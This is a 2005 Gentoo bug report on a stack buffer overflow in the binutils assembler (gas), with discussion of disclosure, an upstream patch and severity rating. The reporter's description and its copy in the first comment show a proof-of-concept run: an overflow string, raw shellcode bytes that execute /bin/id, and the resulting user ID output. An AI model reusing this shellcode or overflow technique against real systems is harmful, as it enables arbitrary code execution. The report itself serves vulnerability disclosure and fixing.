99464 – sys-devel/binutils: buffer overflow in gas

Bug 99464 - sys-devel/binutils: buffer overflow in gas

Summary: sys-devel/binutils: buffer overflow in gas

Status:	RESOLVED FIXED

Alias:	None

Product:	Gentoo Linux
Classification:	Unclassified
Component:	Current packages (show other bugs)
Hardware:	All Linux

Importance:	High minor (vote)
Assignee:	Gentoo Toolchain Maintainers

URL:
Whiteboard:
Keywords:

Depends on:
Blocks:

Reported:	2005-07-18 14:33 UTC by Tavis Ormandy (RETIRED)
Modified:	2005-09-26 17:11 UTC (History)
CC List:	1 user (show)

See Also:
Package list:
Runtime testing required:	---

Attachments
PoC (gas-poc.sh,608 bytes, text/plain) 2005-07-18 14:34 UTC, Tavis Ormandy (RETIRED)	Details
patch (gas-messages-bof.diff,1.98 KB, patch) 2005-07-18 14:34 UTC, Tavis Ormandy (RETIRED)	Details \| Diff
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Tavis Ormandy (RETIRED) gentoo-dev

2005-07-18 14:33:57 UTC

stack buffer overflow in gas, perhaps exploitable via distcc or tricking users 
to compile/assemple code.

$ gas-poc.sh > foo.c
$ gcc foo.c
/tmp/cc4hRCFg.s: Assembler messages:
/tmp/cc4hRCFg.s:13: Error: no such instruction: 
`aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Comment 1 Tavis Ormandy (RETIRED) gentoo-dev

2005-07-18 14:33:57 UTC

stack buffer overflow in gas, perhaps exploitable via distcc or tricking users 
to compile/assemple code.

$ gas-poc.sh > foo.c
$ gcc foo.c
/tmp/cc4hRCFg.s: Assembler messages:
/tmp/cc4hRCFg.s:13: Error: no such instruction: 
`aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÄêÿ¿1À°
f1Û1ÉÍë[1ÀCC
  °
   S
      Íèåÿÿÿ/bin/id'
uid=1000(taviso) gid=100(users) groups=5(tty),6(disk),10(wheel),16(cron),
19(cdrom),35(games),100(users),250(portage),407(mp3),408(mame)
/usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.5-20050130/../../../crt1.o(.text+0x18): 
In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status

PoC attached tested with sys-devel/binutils-2.15.92.0.2-r10, and patch that 
fixes this issue for me.

Comment 2 Tavis Ormandy (RETIRED) gentoo-dev

2005-07-18 14:34:20 UTC

Created attachment 63735 [details]
PoC

Comment 3 Tavis Ormandy (RETIRED) gentoo-dev

2005-07-18 14:34:33 UTC

Created attachment 63736 [details, diff]
patch

Comment 4 SpanKY gentoo-dev

2005-07-18 21:30:12 UTC

how exactly are we to proceed with this ?  the patch def looks good, but should
is something going to contact vuln-sec or should i just post the patch to
binutils mailing list (at which point keeping this bug closed is pointless) ?

Comment 5 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev

2005-07-18 22:08:36 UTC

The plan is like this:  
1. Tigger/SpanKY/Solar please confirm  
2. Taviso please mail vendor-sec 
3. Arch security liaisons test 
4. Coordinated disclosure

Comment 6 rob holland (RETIRED) gentoo-dev

2005-07-19 01:51:50 UTC

confirmed as stack overflow.

as: stack smashing attack in function as_bad()

Comment 7 SpanKY gentoo-dev

2005-07-19 06:02:24 UTC

erm i dont think the binutils guys may be on the vendor sec list ?  i could
e-mail  a handful of the big devs ...

Comment 8 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev

2005-07-19 06:29:58 UTC

Vapier please do. (2a. Contact upstream)

Comment 9 SpanKY gentoo-dev

2005-07-20 15:24:30 UTC

the binutils project does not wish to handle any offerflow/etc... issues in a
private manner

e-mailed the upstream dev list and it should be in shortly

Comment 10 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev

2005-07-20 22:17:30 UTC

Toolchain please provide an updated ebuild.

Comment 11 SpanKY gentoo-dev

2005-07-21 14:56:42 UTC

well there are plenty of other overflows/sanity check patches which have been added to binutils but i've opted to not add to our ebuild ...  as upstream says, they'd rather not treat overflows in binutils as regular vulnerabilities, so issuing a GLSA for this seems a bit overdown ...  also, they've accepted and committed the patch Taviso posted

Comment 12 Tavis Ormandy (RETIRED) gentoo-dev

2005-07-21 23:19:15 UTC

Agreed, not GLSA worthy (you'ld have to trick someone into compiling your source 
code, it doesnt seem too much of a leap to get them to execute it afterwards).

Do you think it's worth adding the patch to our package Spanky?

Comment 13 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev

2005-07-21 23:30:05 UTC

Rerating as B2.

Comment 14 SpanKY gentoo-dev

2005-07-22 10:34:23 UTC

not really ... if i do this one, then i should go through all the other BFD
fixes that have been posted to the binutils mailing list in the last few months
since the 1.16.1 release ...

Comment 15 Thierry Carrez (RETIRED) gentoo-dev

2005-07-30 06:39:58 UTC

Even if we did some GLSAs in the past that required heavy social engineering
(read: dumb user) to work, I don't think we should continue on that trend. I
propose to downgrade this to simple bug status.

Security: please give your opinion.

Comment 16 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev

2005-07-31 12:59:42 UTC

I agree. Reassigning to toolchain, keeping security on cc.

Comment 17 SpanKY gentoo-dev

2005-09-26 17:11:26 UTC

should be all set now